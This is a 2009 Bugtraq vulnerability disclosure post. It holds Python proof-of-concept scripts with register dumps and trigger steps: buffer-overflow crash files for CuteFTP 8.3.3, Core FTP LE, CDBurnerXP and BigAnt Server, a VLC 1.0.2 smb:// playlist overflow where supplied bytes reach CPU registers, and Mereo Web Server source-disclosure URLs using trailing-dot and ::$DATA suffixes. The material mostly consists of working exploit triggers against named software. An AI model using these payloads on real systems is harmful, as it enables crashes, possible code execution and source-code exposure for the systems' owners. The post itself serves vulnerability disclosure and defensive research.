Multiple Vulnerabilities
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Multiple Vulnerabilities
- From: "Dr_IDE" <dr_ide@xxxxxxxxxxxx>
- Date: Fri, 25 Sep 2009 13:24:18 -0400
Usually I submit via milw0rm but it has been unresponsive all week.
Here are a few new vulnerabilities and updates.
-Dr_IDE
#!/usr/bin/env python
#####################################################################################################
#
# CuteFTP v8.3.3 Home/Pro/Lite Create New Site Local Buffer Overflow PoC
# Found By: Dr_IDE
# Download: http://www.cuteftp.com/downloads/
# Tested On: Windows 7 RC, XP might be more shell friendly
# Notes: This PoC exploits the "Create New Site" dialog. Any site type
#        you pick will work. Because each site type is handled by a
#        different internal code path, you may be able to get execution
#        through one of them rather than just a crash.
#
#####################################################################################################
"""
EAX 02120000
ECX 0228BA90 ASCII
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDX 41414141
EBX 00004141
ESP 0018C160
EBP 0018C230
ESI 0228BA88
EDI 41414141
EIP 77843913 ntdll.77843913
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 1 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010212 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty -??? FFFF 000000FF 00FF00FF
ST1 empty -??? FFFF 00000000 00008200
ST2 empty -??? FFFF 00010000 00010000
ST3 empty 431.99999034404754640
ST4 empty 1.0000000000000000000
ST5 empty 1.0000000000000000000
ST6 empty 16.000000000000000000
ST7 empty 16.000000000000000000
3 2 1 0 E S P U O Z D I
FST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
"""
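# PoC only: this script writes a crash-trigger file; it does not execute code.
# The register dump above shows EDX/EDI overwritten with 0x41414141 and EIP
# still inside ntdll, so this dump demonstrates a memory-corruption crash, not
# direct EIP control -- see the notes in the header about other site types.
CUTEFTP_OUTFILE = "CuteFTP.txt"
CUTEFTP_LABEL_LEN = 20000


def cuteftp_payload(length=CUTEFTP_LABEL_LEN):
    """Return the string to paste into the "Label" field of Create New Site.

    Args:
        length: number of 'A' (0x41) bytes; defaults to the 20000 used
            when the crash was reproduced.

    Returns:
        A str of ``length`` 'A' characters.

    Raises:
        ValueError: if ``length`` is negative.
    """
    if length < 0:
        raise ValueError("length must be non-negative")
    return "\x41" * length


def write_cuteftp_poc(path=CUTEFTP_OUTFILE, length=CUTEFTP_LABEL_LEN):
    """Write the payload to ``path`` and return the number of bytes written.

    The file is opened in binary mode so the bytes on disk are exactly the
    payload regardless of platform newline translation.

    Raises:
        IOError/OSError: if the file cannot be created.
    """
    data = cuteftp_payload(length).encode("ascii")
    with open(path, "wb") as fh:
        fh.write(data)
    return len(data)


if __name__ == "__main__":
    # Only I/O failures are caught; anything else is a bug and should surface.
    try:
        write_cuteftp_poc()
    except (IOError, OSError) as exc:
        print("[-] Error. File couldn't be created: %s" % exc)
    else:
        # NOTE(review): the original banner printed "v8.3.2" while the advisory
        # header says v8.3.3; the banner now matches the header.
        print("\nCuteFTP v8.3.3 Home/Pro/Lite Create New Site Local Buffer Overflow PoC")
        print("By: Dr_IDE")
        print("\nFile Created Successfully.\n")
        print("Usage:\n [-] Click File\n [-] Create New FTP Site\n [-] Paste String into Label Field\n [-] Enter anything for Address\n [-] Click Connect\n [-] Boom.")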
##########################################################################################################
#
# VLC Media Player 1.0.2 smb:// URI Handling Remote Stack Overflow PoC
# Found By: Dr_IDE
# Tested: Windows XP SP2, XP SP3 and Windows 7 RC1 with VLC 1.0.2 "Goldeneye"
# Download: http://majorgeeks.com/downloadget.php?id=4674&file=1&evp=a87d1b50269ba27878899d30ec7cd947
#
##########################################################################################################
# XPSP3 Crash
"""
EAX FFFFFFFE
ECX 42424242 <--------- w00t!
EDX 00000000
EBX 42424242
ESP 02EAF694
EBP 02EAF7C4
ESI 61CC8324 libacc_4.61CC8324
EDI 61CC8323 libacc_4.61CC8323
EIP 77C478AC msvcrt.77C478AC
C 0 ES 0023 32bit 0(FFFFFFFF)
P 0 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFAC000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_MOD_NOT_FOUND (0000007E)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty -UNORM FB18 0184A1C0 00AD4518
ST1 empty +UNORM 2088 00000000 00000000
ST2 empty 0.3987488760738806780e-4933
ST3 empty -??? FFFF 00000000 77C2C42E
ST4 empty +UNORM 0B10 00B094E8 00000000
ST5 empty 0.3987486256431287370e-4933
ST6 empty 0.0
ST7 empty -0.2650710894356302916
3 2 1 0 E S P U O Z D I
FST 0020 Cond 0 0 0 0 Err 0 0 1 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
"""
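# PoC only: builds an XSPF playlist whose single track location is an smb://
# URI with an oversized fragment. The XP SP3 dump above shows ECX and EBX set
# to 0x42424242 (the four 'B' bytes placed at offset 2 of the fragment) with
# EIP inside msvcrt, i.e. attacker-controlled data reaches registers.
VLC_OUTFILE = "vlc_1.0.2.xspf"
VLC_PAD_LEN = 10000

# NOTE(review): the host part of the smb:// URI reads "xxxxxxxxxxxxxxx" in the
# list archive, which looks like address masking by the archive rather than
# the author's original value; it is kept verbatim because the fragment after
# "#{" is what the PoC relies on.
XSPF_HEAD = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">\n'
    "\t<title>Playlist</title>\n"
    "\t<trackList>\n"
    "\t\t<track>\n"
    "\t\t\t<location>smb://example.com@xxxxxxxxxxxxxxx/foo/#{"
)
XSPF_TAIL = (
    "}</location>\n"
    '\t\t\t<extension application="http://www.videolan.org/vlc/playlist/0">\n'
    "\t\t\t\t<vlc:id>0</vlc:id>\n"
    "\t\t\t</extension>\n"
    "\t\t</track>\n"
    "\t</trackList>\n"
    "</playlist>\n"
)


def vlc_payload(pad_len=VLC_PAD_LEN):
    """Return the fragment body: 2 x 'A', 4 x 'B', then ``pad_len`` x 'C'.

    The 'B' marker is what the register dump shows landing in ECX/EBX.

    Raises:
        ValueError: if ``pad_len`` is negative.
    """
    if pad_len < 0:
        raise ValueError("pad_len must be non-negative")
    return "\x41" * 2 + "\x42" * 4 + "\x43" * pad_len


def vlc_xspf(pad_len=VLC_PAD_LEN):
    """Return the complete playlist text with the payload embedded."""
    return XSPF_HEAD + vlc_payload(pad_len) + XSPF_TAIL


def write_vlc_poc(path=VLC_OUTFILE, pad_len=VLC_PAD_LEN):
    """Write the playlist to ``path`` and return the number of bytes written.

    Binary mode keeps the "\\n" line endings byte-exact on every platform.

    Raises:
        IOError/OSError: if the file cannot be created.
    """
    data = vlc_xspf(pad_len).encode("ascii")
    with open(path, "wb") as fh:
        fh.write(data)
    return len(data)


if __name__ == "__main__":
    try:
        write_vlc_poc()
    except (IOError, OSError) as exc:
        print("Error: %s" % exc)
    else:
        print("\nExploit file created!\n")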
#!/usr/bin/env python
####################################################################################
#
# Core FTP LE v2.1 build 1612 Local Buffer Overflow PoC (Unicode)
# Found By: Dr_IDE
# Tested On: XPSP3, 7RC
# Notes: Most likely other versions are vulnerable too.
# Usage: File, Quick Connect, Paste into Hostname, Connect
#
####################################################################################
# Register Dump on XPSP3
"""
EAX 00000064
ECX 00410041 coreftp.00410041
EDX 0054F840 coreftp.0054F840
EBX 026E2FFC
ESP 0321E958 UNICODE
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 00410041 coreftp.00410041
ESI 0269CC30
EDI 04BB6A58 UNICODE
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EIP 00410041 coreftp.00410041
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFD7000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr WSAHOST_NOT_FOUND (00002AF9)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty 0.0
ST1 empty 0.0
ST2 empty 0.0
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 0.0
ST7 empty 0.0
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
"""
# After Passing Exception on XPSP3
# EIP 00410041 coreftp.00410041
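# PoC only: writes the hostname string to paste into Quick Connect.
# The dump above tags ESP/EDI as UNICODE and shows EIP/EBP/ECX = 0x00410041,
# i.e. the ASCII 'A's reach the overflow after widening to UTF-16LE (0x0041),
# which is why the header calls this a Unicode overflow.
COREFTP_OUTFILE = "coreftple.txt"
COREFTP_HOST_LEN = 6000


def coreftp_payload(length=COREFTP_HOST_LEN):
    """Return ``length`` 'A' (0x41) characters for the Hostname field.

    Raises:
        ValueError: if ``length`` is negative.
    """
    if length < 0:
        raise ValueError("length must be non-negative")
    return "\x41" * length


def write_coreftp_poc(path=COREFTP_OUTFILE, length=COREFTP_HOST_LEN):
    """Write the payload to ``path`` in binary mode; return bytes written.

    Raises:
        IOError/OSError: if the file cannot be created (not caught, as in
        the original script).
    """
    data = coreftp_payload(length).encode("ascii")
    with open(path, "wb") as fh:
        fh.write(data)
    return len(data)


if __name__ == "__main__":
    write_coreftp_poc()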
#!/usr/bin/env python
####################################################################################
#
# CDBurnerXP v 4.2.4.1351 Local Crash PoC
# Found By: Dr_IDE
# Tested On: XPSP3, 7RC
# Usage: Create New Data Disc, Add a Folder, Paste to Rename Folder,
#        Click Save Compilation as ISO
# Notes: Super lame and most likely not exploitable.
#
####################################################################################
'''
Error Message:
System.NullReferenceException: Object reference not set to an instance of an
object.
at CDBurnerXP.Controls.FileLayoutManager.SaveAsIso(String filename)
at CDBurnerXP_Pro.frmDataCompilation.mnuSaveISO_Click(Object sender,
EventArgs e)
at System.Windows.Forms.MenuItem.OnClick(EventArgs e)
at System.Windows.Forms.MenuItem.MenuItemData.Execute()
at System.Windows.Forms.Command.Invoke()
at System.Windows.Forms.Command.DispatchID(Int32 id)
at System.Windows.Forms.Control.WmCommand(Message& m)
at System.Windows.Forms.Control.WndProc(Message& m)
at System.Windows.Forms.ScrollableControl.WndProc(Message& m)
at System.Windows.Forms.ContainerControl.WndProc(Message& m)
at System.Windows.Forms.Form.WndProc(Message& m)
at CDBurnerXP.Forms.BaseForm.WndProc(Message& m)
at CDBurnerXP_Pro.mdiMain.WndProc(Message& m)
at System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)
at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr
wparam, IntPtr lparam)
'''
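# PoC only: writes the folder name to paste before "Save Compilation as ISO".
# The failure above is a managed System.NullReferenceException in
# FileLayoutManager.SaveAsIso, not a native memory corruption, which matches
# the header's assessment that this is most likely not exploitable.
CDBURNERXP_OUTFILE = "cdburnerxp.txt"
CDBURNERXP_NAME_LEN = 5000


def cdburnerxp_payload(length=CDBURNERXP_NAME_LEN):
    """Return ``length`` 'A' (0x41) characters to use as the folder name.

    Raises:
        ValueError: if ``length`` is negative.
    """
    if length < 0:
        raise ValueError("length must be non-negative")
    return "\x41" * length


def write_cdburnerxp_poc(path=CDBURNERXP_OUTFILE, length=CDBURNERXP_NAME_LEN):
    """Write the payload to ``path`` in binary mode; return bytes written.

    Raises:
        IOError/OSError: if the file cannot be created (not caught, as in
        the original script).
    """
    data = cdburnerxp_payload(length).encode("ascii")
    with open(path, "wb") as fh:
        fh.write(data)
    return len(data)


if __name__ == "__main__":
    write_cdburnerxp_poc()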
#!/usr/bin/env python
########################################################################
#
# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
# Found By: Dr_IDE
# Tested: XPSP3
# Usage: Open BigAnt Console, Go to Plug-In, Add our zip, Boom.
#
########################################################################
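# PoC only: the "zip" is not an archive at all, just 10000 'A' bytes, so the
# crash is triggered by whatever BigAnt does with a malformed plug-in file
# before (or while) parsing it as ZIP.
BIGANT_PLUGIN_OUTFILE = "BigAntPlugIn.zip"
BIGANT_PLUGIN_LEN = 10000


def bigant_plugin_payload(length=BIGANT_PLUGIN_LEN):
    """Return ``length`` 'A' (0x41) characters as the plug-in file body.

    Raises:
        ValueError: if ``length`` is negative.
    """
    if length < 0:
        raise ValueError("length must be non-negative")
    return "\x41" * length


def write_bigant_plugin_poc(path=BIGANT_PLUGIN_OUTFILE, length=BIGANT_PLUGIN_LEN):
    """Write the payload to ``path`` in binary mode; return bytes written.

    Raises:
        IOError/OSError: if the file cannot be created (not caught, as in
        the original script).
    """
    data = bigant_plugin_payload(length).encode("ascii")
    with open(path, "wb") as fh:
        fh.write(data)
    return len(data)


if __name__ == "__main__":
    write_bigant_plugin_poc()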
#!/usr/bin/env python
########################################################################
#
# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
# Found By: Dr_IDE
# Tested: XPSP3
# Usage: Open BigAnt Console, Go to Update, Add our zip, Boom.
#
########################################################################
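# PoC only: identical payload to the plug-in PoC above; the only differences
# are the console entry used (Update instead of Plug-In) and the file name.
BIGANT_UPDATE_OUTFILE = "BigAntUpdate.zip"
BIGANT_UPDATE_LEN = 10000


def bigant_update_payload(length=BIGANT_UPDATE_LEN):
    """Return ``length`` 'A' (0x41) characters as the update file body.

    Raises:
        ValueError: if ``length`` is negative.
    """
    if length < 0:
        raise ValueError("length must be non-negative")
    return "\x41" * length


def write_bigant_update_poc(path=BIGANT_UPDATE_OUTFILE, length=BIGANT_UPDATE_LEN):
    """Write the payload to ``path`` in binary mode; return bytes written.

    Raises:
        IOError/OSError: if the file cannot be created (not caught, as in
        the original script).
    """
    data = bigant_update_payload(length).encode("ascii")
    with open(path, "wb") as fh:
        fh.write(data)
    return len(data)


if __name__ == "__main__":
    write_bigant_update_poc()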
#################################################################################
#
# Mereo Web Server v1.8 Multiple Remote Source Code Disclosure
# Found By: Dr_IDE
# Tested On: Windows XPSP3
#
#################################################################################
- Description -
Mereo Web Server v1.8 is a Windows-based HTTP server; at the time of writing it is the
latest available version.
Mereo discloses the raw contents of server-side files to remote clients when the
requested filename is suffixed as shown below. This is presumably the classic Windows
name-normalization issue: the Win32 file APIs strip a trailing dot and treat "::$DATA"
as the default NTFS data stream, so the file still opens, but the server's
extension-based handling no longer matches and the file is returned unprocessed.
- Technical Details -
Append either suffix to the path of the target file:
http://[webserver IP]/[file].
http://[webserver IP]/[file]::$DATA
Examples:
http://172.16.2.101/index.html.
http://172.16.2.101/index.html::$DATA